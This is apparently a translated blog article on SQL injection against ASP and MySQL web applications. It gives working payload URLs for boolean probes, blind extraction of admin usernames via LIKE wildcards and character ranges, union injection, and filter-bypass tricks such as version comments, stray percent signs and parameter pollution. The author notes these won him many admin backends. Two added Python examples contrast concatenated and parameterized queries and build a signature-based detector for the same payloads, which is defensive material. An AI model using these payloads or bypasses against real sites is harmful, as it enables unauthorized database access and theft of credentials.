This article is written to record these notes and to share them; experts of every kind are welcome to criticize and correct it.
The traditional injection test is as follows:
and 1=1 / and 1=2, to tell whether the injected condition evaluates true or false. Of course there are also or 1=2, or 1=1, or id=1+1, or id=2-1, and so on.
The purpose of this article is not to judge whose testing method is practical, but to recommend some newer injection techniques, some of which may have been mentioned before.
First, the true/false tests:
A NULL value can be used: and 1 is null, and 1 is not null.
Or: and 2<=3
Many people habitually use = for the test, but >=, <=, is null, is not null and <> all work just as well.
For blind SQL injection the usual method is:
ascii(substring(password,1,1))=56, or ord(mid(password,1,1))=56, and so on.
SQL has the LIKE search operator. By writing table.column we can lock onto the column directly, which lets us drop select, from, where and the other keywords that filters look for. Here is a demonstration with the '_' single-character placeholder :)
http://url/1.asp?string=wooden' and admin.user like '_' and '1'='1        (false)
http://url/1.asp?string=wooden' and admin.user like '__' and '1'='1       (false)
...
http://url/1.asp?string=wooden' and admin.user like '_____' and '1'='1    (true)
This pins down the column length directly: 5 placeholders means 5 characters. Inside the LIKE pattern we can use the '-' symbol to test a range of characters at once. For example:
http://url/1.asp?string=wooden' and admin.user like '[0-9]____' and '1'='1    (false)
http://url/1.asp?string=wooden' and admin.user like '[a-z]____' and '1'='1    (true)
http://url/1.asp?string=wooden' and admin.user like '[a-h]____' and '1'='1    (true)
http://url/1.asp?string=wooden' and admin.user like '[a-B]____' and '1'='1    (true)
http://url/1.asp?string=wooden' and admin.user like 'B____' and '1'='1        (false)
http://url/1.asp?string=wooden' and admin.user like 'a____' and '1'='1        (true)
So the first character of the user column in the admin table is 'a'; the remaining characters follow the same principle, and the data is brute-forced directly through range values.
Remember the sum function? It can be applied directly to determine the data type:
http://url/1.asp?string=wooden' and sum(admin.user)=1 and '1'='1
Of course, some of SQL's built-in functions can also be used:
http://url/1.asp?string=wooden' and len(admin.user)>4 and '1'='1
http://url/1.asp?string=wooden' and ascii(substring(admin.user,1,1))>100 and '1'='1
In error-based mode (the database error is shown on the page), ' and (admin.user)=0 can be used to obtain data.
This method, however, only works against the tables and columns used by the current query, so it is mainly suited to injection at the admin login form, together with having 1=1 (numeric) or d' having '1'='1 (string). It has helped me win a lot of admin backends :)
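Every probe above relies on the application pasting the parameter into the SQL text. The Python script below is an added example (not code from the article) that runs probes of the same shape against a constructed SQLite table through a concatenated query and through a parameterized one, so the difference is visible: the concatenated path answers each true/false question, the bound path never does. The table name admin and column user follow the article; 'alice' replaces 'wooden' as a base value that actually exists in the constructed data, and SQLite's length() and a between test stand in for len() and the [a-h] range, which SQLite's LIKE does not support.

```python
import sqlite3

# Added example, not code from the article. Table and column names (admin, user) follow the
# article; the rows and probe values are constructed.

def make_db():
    """In-memory SQLite database with a constructed admin table."""
    con = sqlite3.connect(":memory:")
    con.execute("create table admin (id integer primary key, user text, password text)")
    con.executemany("insert into admin (user, password) values (?, ?)",
                    [("alice", "p@ss1"), ("bob", "p@ss2")])
    con.commit()
    return con

def lookup_vulnerable(con, value):
    """Builds the statement by concatenation: a quote in value closes the literal, the rest is parsed as SQL."""
    sql = "select id from admin where user = '" + value + "'"
    return [row[0] for row in con.execute(sql)]

def lookup_safe(con, value):
    """Same lookup with a bound parameter: value is compared as one opaque string, never parsed."""
    return [row[0] for row in con.execute("select id from admin where user = ?", (value,))]

# Constructed probes in the article's style. The base value is 'alice' (a user that exists) so a
# true condition returns her row and a false one returns nothing. SQLite stand-ins: length() for
# len(), and a between test for the [a-h] range that SQLite's LIKE does not support.
PROBES = {
    "and 1=1":           "alice' and 1=1 and '1'='1",
    "and 1=2":           "alice' and 1=2 and '1'='1",
    "and 1 is null":     "alice' and 1 is null and '1'='1",
    "and 1 is not null": "alice' and 1 is not null and '1'='1",
    "and 2<=3":          "alice' and 2<=3 and '1'='1",
    "like '____' (4)":   "alice' and admin.user like '____' and '1'='1",
    "like '_____' (5)":  "alice' and admin.user like '_____' and '1'='1",
    "first char a-h":    "alice' and substr(admin.user,1,1) between 'a' and 'h' and '1'='1",
    "length > 4":        "alice' and length(admin.user) > 4 and '1'='1",
}

def run_probes(con=None):
    """Return {probe: (row_returned_via_concatenation, row_returned_via_parameter)}."""
    if con is None:
        con = make_db()
    return {name: (bool(lookup_vulnerable(con, payload)), bool(lookup_safe(con, payload)))
            for name, payload in PROBES.items()}

if __name__ == "__main__":
    for name, (vuln, safe) in run_probes().items():
        print(f"{name:18} concatenated: {str(vuln):5}  parameterized: {safe}")
```

Running it prints one line per probe; the concatenated column alternates between True and False exactly as the article's page-difference oracle would, while the parameterized column is False throughout because no user is literally named "alice' and ...". Binding parameters is the fix that makes the '_' and range probes inert as well.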
MySQL also provides some functions that can be used, such as:
find_in_set example: find_in_set('56', ascii(substr(password,1,1)))=1
strcmp example: strcmp(left(password,1),0x56)=1
Now let's talk about union. For conventional injection we can use union select 1,2,3,4 or union/**/select/**/1,2,3,4
For IIS, a % can be used to bypass filters, e.g.: union selec%t,3,4-%--
For MySQL you can use: union select 1&id=2,3&id=4
When select is filtered: union /**//*!select*/1,2,4, or union/**/s/**/elec/**/t/**/1,2,3,4
You can even use union /**//*!5100select*/1&id=2,3&id=4 (5100 is the MySQL version number)
When the statement has several conditions and the rest of it cannot be commented out, for example select * from table where id=1 and name=xxx, we can do this:
id=1+union/*&name=*/select+1,2
In union injection the union result is only shown when the first condition is false. For example:
and 1=2 union select xxxxxx
You can also do this: id=wooden'/*!5100and*/1 is null union /*!5100select*/xxxxx, which bypasses most blacklist mechanisms.
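From the detection side, the comment, percent and repeated-parameter tricks above share one property: a keyword check on the raw query string misses the keyword while the database still sees it. The Python below is an added example, not code from the article, that normalizes a query string the way the article says classic ASP/IIS and MySQL would treat it (an assumption about that particular stack: repeated parameters joined with ', ', all values landing in one statement, a stray % dropped, the body of /*!NNNNN ... */ kept, /**/ removed) and then matches a few signatures drawn from this article. The sample query strings are constructed from the payload shapes on this page, not captured traffic.

```python
import re
from urllib.parse import parse_qsl

# Added example, not code from the article. The normalization rules model the ASP/IIS and
# MySQL behaviour the article relies on; treat them as assumptions about one stack.

VERSION_COMMENT = re.compile(r"/\*!\d*\s*(.*?)\*/", re.S)   # MySQL executes the body of /*!5100select*/
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)             # /**/ is ignored by the database
STRAY_PERCENT = re.compile(r"%(?![0-9A-Fa-f]{2})")         # assumption: IIS drops a % that is not a valid escape

SIGNATURES = {
    # "unionselect" (after comment stripping) or union ... select anywhere in the text
    "union-select": re.compile(r"\bunion\W*(?:all\W*)?select|\bunion\b.*?\bselect\b", re.I | re.S),
    # and 1=1, or 1=2, and 2<=3, and '1'='1, and 1 is [not] null
    "boolean-probe": re.compile(
        r"\b(?:and|or)\b\s*(?:'?\d+'?\s*(?:<>|<=|>=|=|<|>)\s*'?\d+'?|\d+\s+is\s+(?:not\s+)?null)", re.I),
    "like-wildcard": re.compile(r"\blike\s*'[^']*[_\[]", re.I),      # like '_' and like '[a-z]' probes
    "having-probe": re.compile(r"\bhaving\s+'?1'?\s*=\s*'?1", re.I),
    "blind-charfn": re.compile(
        r"\b(?:ascii|ord|strcmp|find_in_set|len|length|substring|substr|mid)\s*\(", re.I),
}

def normalize(query_string):
    """Return the text variants a keyword check should inspect for one query string.

    parse_qsl URL-decodes and turns + into space. Repeated parameters are joined with ', '
    and every value is concatenated, mirroring the ASP behaviour behind id=1&id=2. Comments
    are stripped twice, once as a space and once as nothing, so that both union/**/select
    and s/**/elec/**/t end up containing the word select in some variant.
    """
    values = {}
    for key, val in parse_qsl(query_string, keep_blank_values=True):
        values.setdefault(key, []).append(val)
    text = " ".join(", ".join(v) for v in values.values())
    text = STRAY_PERCENT.sub("", text)              # selec%t -> select
    text = VERSION_COMMENT.sub(r" \1 ", text)       # /*!5100select*/ -> select
    return {re.sub(r"\s+", " ", PLAIN_COMMENT.sub(sep, text)) for sep in (" ", "")}

def classify(query_string):
    """Sorted names of the signatures that match any normalized variant."""
    hits = {name for variant in normalize(query_string)
            for name, pattern in SIGNATURES.items() if pattern.search(variant)}
    return sorted(hits)

# Constructed query strings shaped like the article's payloads; not captured traffic.
SAMPLES = {
    "benign":          "string=wooden&id=7",
    "like-probe":      "string=wooden' and admin.user like '_____' and '1'='1",
    "blind-ascii":     "string=wooden' and ascii(substring(password,1,1))=56 and '1'='1",
    "having":          "user=d' having '1'='1",
    "iis-percent":     "id=1 union selec%t 1,2,3,4-%--",
    "param-pollution": "id=1 union select 1&id=2,3&id=4",
    "version-comment": "id=1 union /**//*!5100select*/1&id=2,3&id=4",
    "split-keyword":   "id=1 union/**/s/**/elec/**/t/**/1,2,3,4",
    "comment-bridge":  "id=1+union/*&name=*/select+1,2",
    "null-probe":      "id=wooden'/*!5100and*/1 is null union /*!5100select*/xxxxx",
}

def scan(samples=SAMPLES):
    """Classify every sample; returns {label: [signature names]}."""
    return {label: classify(qs) for label, qs in samples.items()}

if __name__ == "__main__":
    for label, hits in scan().items():
        print(f"{label:16} {hits or 'clean'}")
```

The point of producing two comment-stripped variants is that no single replacement serves both cases: replacing /**/ with a space keeps union and select as separate words, while replacing it with nothing reassembles s/**/elec/**/t. A detector that picks one rule will miss the other shape, which is exactly the gap the article's payloads aim at.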
This article comes from the dedicated waiting blog